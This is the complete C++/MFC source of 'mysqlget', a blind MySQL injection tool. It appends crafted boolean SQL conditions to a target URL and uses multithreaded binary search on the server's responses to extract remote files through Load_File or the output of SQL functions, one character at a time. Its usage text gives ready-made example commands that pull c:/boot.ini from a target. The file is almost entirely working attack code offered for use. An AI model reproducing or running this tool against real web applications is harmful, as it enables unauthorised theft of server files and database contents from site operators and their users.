// mysqlget.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include "mysqlget.h"
#include "BinSearch.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
#define MAX_RECVLEN 2048
#define MAX_FILELEN 102400
#define MAX_THREAD 512
#define ASCII_BEGIN 0
#define ASCII_END 255 //255 include gb2312,127 include ascii
/////////////////////////////////////////////////////////////////////////////
// The one and only application object


CWinApp theApp;
BOOL GetFile(CString szFile);
BOOL GetResponse(CString szURL);
int GetFileLen(int iLen);
int GetFileData(int iData,int iOffset);
UINT GetOffsetData(LPVOID lparam);
void Usage();
void SaveFile(int iLen);
using namespace std;

CString szInj,szErrCode,szRightCode,szGetFile,szSaveFile,szFunction;
char *szContent;
int iFileLen,iStart,iEnd,iRange,iFlag,iThread=MAX_THREAD;
CCriticalSection ccs;
int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
	int nRetCode = 0;
	
	// initialize MFC and print and error on failure
	if (!AfxWinInit(::GetModuleHandle(NULL), NULL, ::GetCommandLine(), 0))
	{
		// TODO: change error code to suit your needs
		cerr << _T("Fatal Error: MFC initialization failed") << endl;
		nRetCode = 1;
	}
	else if(argc>7)
	{
		cout << "\n---------------------------------------------------\n";

		iStart=iEnd=iRange=0;
		CString szLoadFile;
		for(int i=0;i<argc;i++)
		{
			if(argv[i][0] == '-' || argv[i][0] == '/')
			{
				switch(tolower(argv[i][1]))
				{
				case 't':
					szInj=argv[++i];
					break;
				case 'f':
					szLoadFile=argv[++i];
					break;
				case 's':
					szSaveFile=argv[++i];
					break;
				case 'r':
					{
						char *p=strchr(argv[++i],'-');
						if(p!=NULL){
							*p='\0';
							iEnd=atoi(p+1);
							iStart=atoi(argv[i]);
						}
						else
							iRange=atoi(argv[i]);
					}
					break;
				case 'm':
					if(tolower(argv[i][2]) == 'r')
						szRightCode=argv[++i];
					else
						szErrCode=argv[++i];
					break;
				default:
					break;
				}
			}
			else
				iThread=atoi(argv[i]);
		}
		cout << "Target > " <<(LPCTSTR)szInj << endl;
		if(szLoadFile.Find("/") == -1 && szLoadFile.Find("\\") == -1 )
			cout << "FunExe > " <<(LPCTSTR)szLoadFile  << endl;
		else
			cout << "FileLD > " <<(LPCTSTR)szLoadFile  << endl;
		cout << "FileSF > " <<(LPCTSTR)szSaveFile  << endl;
		cout << "RiCode > " <<(LPCTSTR)szRightCode << endl;
		cout << "ErCode > " <<(LPCTSTR)szErrCode   << endl;
		cout << "Thread > " << iThread << endl;
		cout << "Length > Max " << MAX_FILELEN << " bytes" <<endl;
		cout << "FRange > " ;
		if(iRange>0)
			cout << iRange << " bytes Append to File Async" << endl;
		else if(iEnd==0)
			cout << "All data from Remote File" <<endl;
		else
			cout << iStart << "-" << iEnd << " Offset from Remote File" <<endl;

		cout << "ARange > " << ASCII_BEGIN << " - " <<ASCII_END <<" Include GB2312" << endl;
		cout << "---------------------------------------------------\n";
		GetFile(szLoadFile);
	}
	else
		Usage();
	return nRetCode;
}

BOOL GetFile(CString szFile)
{
	CString szTmp;
	int iTmp=iThread,i;
	DWORD dwBegin=::GetTickCount();
	//
	if(szFile.Find("/") == -1 && szFile.Find("\\") == -1 )
	{
		szFunction=szFile;
		iFlag=1; //Means eval Function
		//cout << (LPCTSTR)szFunction << endl;
	}
	else
	{
		for(i=0;i<szFile.GetLength();i++)
		{
			szTmp.Format("%x",szFile[i]);
			szGetFile+=szTmp;
		}
		iFlag=0;
	}
	CBinSearch bs(0,MAX_FILELEN);
	if(iFlag)
		cout << "[+] Get function result length ..." << endl;
	else
		cout << "[+] Waiting for get file length ... " << endl;
	while(bs.flag != 0 && bs.upper !=-1)
	{
		bs.flag=GetFileLen(bs.GetValue());
		//printf("Low:%d,Upper:%d,Mid:%d,Flag:%d\n",bs.low,bs.upper,bs.mid,bs.flag);
	}
	if(iFlag)
		cout << "[+] Function echo length " << bs.mid << " bytes " << endl;
	else
		cout << "[+] File length " << bs.mid<< " bytes " << endl;
	iFileLen=bs.mid;
	if(iFileLen == 0)
	{
		cout << "[-] Program abort ........\r\n" << endl;
		return FALSE;
	}
	else{
		if(iFlag)
			cout << "[+] Keep " << iThread << " threads get function echo" <<endl;
		else
			cout << "[+] Keep " << iThread << " threads get data" <<endl;
	}
	
	//Check if File Exists
	if(!iFlag)
	{
		CFile file(szSaveFile,CFile::modeCreate | CFile::modeWrite | CFile::modeNoTruncate);
		i=file.GetLength();
		if(i>0){
			cout << "[+] File Exist,Append Data Async ..." << endl; 
			if(i>=iFileLen)
			{
				cout << "[+] Already Save "<<i<<" Bytes,Program Abort.\n" << endl;
				return -1;
			}
			iStart=i+1;
			if(iRange>0)
				iEnd=iStart+iRange-1;
			else
				iEnd=iFileLen;
		}
		file.Close();
	}

	//Check Variables
	if((iStart+iEnd)==0 && iRange >0 ){
		iStart=1;
		iEnd=iStart+iRange-1;
	}
	if(iEnd>iFileLen){
		iEnd=iFileLen;
		iRange=iEnd-iStart+1;
	}
	if(iRange==0 && iEnd != 0)
		iRange=iEnd-iStart+1;

	if(iEnd==0 && iFileLen >0){
		iStart=1;
		iEnd=iFileLen;
		iRange=iEnd-iStart+1;
	}
	printf("[+] iStart/iEnd/iRange >> %d/%d/%d\n\n",iStart,iEnd,iRange);

	//Alloc Buffer and Init
	int iBuffer=iEnd>=iStart?iEnd-iStart+2:iFileLen+1;
	szContent= new char [iBuffer]; //Must be more than 1 byte to \0
	memset(szContent,0,iBuffer);	//init buffer
	CWinThread **pThread=new CWinThread *[iBuffer-1];
	HANDLE *hThread=new HANDLE[iBuffer-1];
	
	//printf("%d:%d:%d",(iEnd>iStart?iStart:1),(iEnd>iStart?iEnd:bs.mid),iBuffer-1);
	for(i=(iEnd>=iStart?iStart:1);i<=(iEnd>=iStart?iEnd:bs.mid); i++,iThread--) //Mutile Thread to Crack
	{
		iBuffer--;
		pThread[iBuffer-1]=AfxBeginThread(GetOffsetData,(LPVOID)i);
		hThread[iBuffer-1]=pThread[iBuffer-1]->m_hThread;
		while(iThread == 0 )Sleep(100);
	}
	while(iThread != iTmp)::Sleep(2000);
	// ::WaitForMultipleObjects(iFileLen,hThread,TRUE,INFINITE);
	printf("\n[+] Threads return using %ds \n",(GetTickCount()-dwBegin)/1000);
	cout << "---------------------------------------------------\n";
	printf("%s\n",szContent);
	cout << "---------------------------------------------------\n";
	if(!iFlag)
	{
		SaveFile((iEnd>=iStart) ? iEnd-iStart+1 : iFileLen);
		if(iRange>0)
			printf("[+] Append to file %s ...\n",szSaveFile);
		else
			printf("[+] Save file to %s ...\n",szSaveFile);
	}
	return TRUE;
}

BOOL GetResponse(CString szURL)
{
	//cout << (LPCTSTR)szURL << endl;
	BOOL bRet=FALSE;
	int retry=5;
	try{
loop:
		CInternetSession ss;
		CHttpFile *pF=(CHttpFile *)ss.OpenURL(szURL);
		CString szData;
		while(pF->ReadString(szData))
		{

			if(szData.Find(szRightCode) !=-1 && szRightCode.GetLength() >0)
			{
				bRet=TRUE;
				goto exit;
			}
			else if(szData.Find(szErrCode) && szErrCode.GetLength() >0)
			{
				bRet=FALSE;
				goto exit;
			}
			szData.ReleaseBuffer();
		}
	exit:
		pF->Close();
		ss.Close();
	}
	catch(...){
		if(retry--)
			goto loop;
	}
	return bRet;
}

int GetFileLen(int iLen)
{
	// return -1,0,1
	CString szSuffix,szURL;
	szURL=szInj;
	if(iFlag)
		szSuffix.Format("+and+Length(%s)=%d",szFunction,iLen);
	else
		szSuffix.Format("+and+Length(Load_File(0x%s))=%d",szGetFile,iLen);
	if(szURL.Find("%s") == -1)
		szURL+=szSuffix;
	else
		szURL.Replace("%s",szSuffix);
	if(GetResponse(szURL))
		return 0;
	szURL.Empty();
	szURL=szInj;
	if(iFlag)
		szSuffix.Format("+and+Length(%s)>%d",szFunction,iLen);
	else
		szSuffix.Format("+and+Length(Load_File(0x%s))>%d",szGetFile,iLen);
	if(szURL.Find("%s") == -1)
		szURL+=szSuffix;
	else
		szURL.Replace("%s",szSuffix);
	if(GetResponse(szURL))
		return -1;
	else return 1;
	return 0;
}

int GetFileData(int iData,int iOffset)
{
	// return -1,0,1
	CString szSuffix,szURL;
	szURL=szInj;
	if(iFlag)
		szSuffix.Format("+and+ASCII(MID(%s,%d,1))=%d",szFunction,iOffset,iData);
	else
		szSuffix.Format("+and+ASCII(MID(Load_File(0x%s),%d,1))=%d",szGetFile,iOffset,iData);
	if(szURL.Find("%s") == -1)
		szURL+=szSuffix;
	else
		szURL.Replace("%s",szSuffix);
	if(GetResponse(szURL))
		return 0;
	//
	szURL=szInj;
	if(iFlag)
		szSuffix.Format("+and+ASCII(MID(%s,%d,1))>%d",szFunction,iOffset,iData);
	else
		szSuffix.Format("+and+ASCII(MID(Load_File(0x%s),%d,1))>%d",szGetFile,iOffset,iData);
	if(szURL.Find("%s") == -1)
		szURL+=szSuffix;
	else
		szURL.Replace("%s",szSuffix);
	if(GetResponse(szURL))
		return -1;
	else return 1;
	return 0;
}
UINT GetOffsetData(LPVOID lparam)
{
	ccs.Lock();
	int iOffset=(int)lparam;
	ccs.Unlock();
	CBinSearch bd(ASCII_BEGIN,ASCII_END);
	while(bd.flag != 0 && bd.upper !=-1)
	{
		bd.flag=GetFileData(bd.GetValue(),iOffset);
		//printf("Low:%d,Upper:%d,Mid:%d,Flag:%d\n",bs.low,bs.upper,bd.mid,bd.flag);
	}
	char szStr[255],szFormat[255];
	memset(szStr,0,sizeof(szStr));
	memset(szFormat,0,sizeof(szFormat));
	sprintf(szStr,"%d",iFileLen);
	sprintf(szFormat,"[Offset %%0%dd/%%d] : %%d\t[%%c]\n",strlen(szStr));
	printf(szFormat,iOffset,iFileLen,bd.mid,bd.mid);
	if(iStart==0)
		szContent[iOffset-iStart-1]=bd.mid;
	else
		szContent[iOffset-iStart]=bd.mid;
	iThread++;
	return TRUE;
}

void SaveFile(int iLen)
{
	CFile file(szSaveFile,CFile::modeCreate | CFile::modeWrite | CFile::modeNoTruncate);
	file.SeekToEnd();
	file.Write(szContent,iLen);
	file.Close();
}
void Usage()
{
	cout << "\n mysqlget for mysql injection Version 1.0.3 " <<endl;
	cout << " xdiyer at gmail.com http://xdiyer.uni.cc " <<endl;
	cout << "---------------------------------------------------\n";
	cout << "\nUsage: mysqlget <options> <Thread>\n" <<endl;
	cout << "Options:" <<endl;
	cout << "    -t\t\t Target injection URL include %s to replace." <<endl;
	cout << "    -f\t\t Remote file to load or Function to echo." <<endl;
	cout << "    -s\t\t Local file to saved.If file exists,async append" <<endl;
	cout << "    -r\t\t Range of remote file's offset or bytes" <<endl;
	cout << "    -Mr\t\t Match code case response right." <<endl;
	cout << "    -Me\t\t Match code case response error.\r\n" <<endl;
	cout << "Example:\n mysqlget -t http://localhost/index.php?id=1%s -f c:/boot.ini -s E:/data.txt -Mr test 8" <<endl;
	cout << "\t#Means get remote file all data save to local\n" << endl;
	cout << " mysqlget -t http://localhost/index.php?id=1%s -f c:/boot.ini -s E:/data.txt -r 1-200 -Mr test 8" <<endl;
	cout << "\t#Means get remote file 1-200 bytes save to local\n" << endl;
	cout << " mysqlget -t http://localhost/index.php?id=1%s -f c:/boot.ini -s E:/data.txt -r 300 -Mr test 8" <<endl;
	cout << "\t#Means get remote file 300 bytes down or async append to local file\n" << endl;
	cout << " mysqlget -t http://localhost/index.php?id=1%s -f version() -Mr test 8" <<endl;
	cout << "\t#Means echo function version()\n" << endl;

}
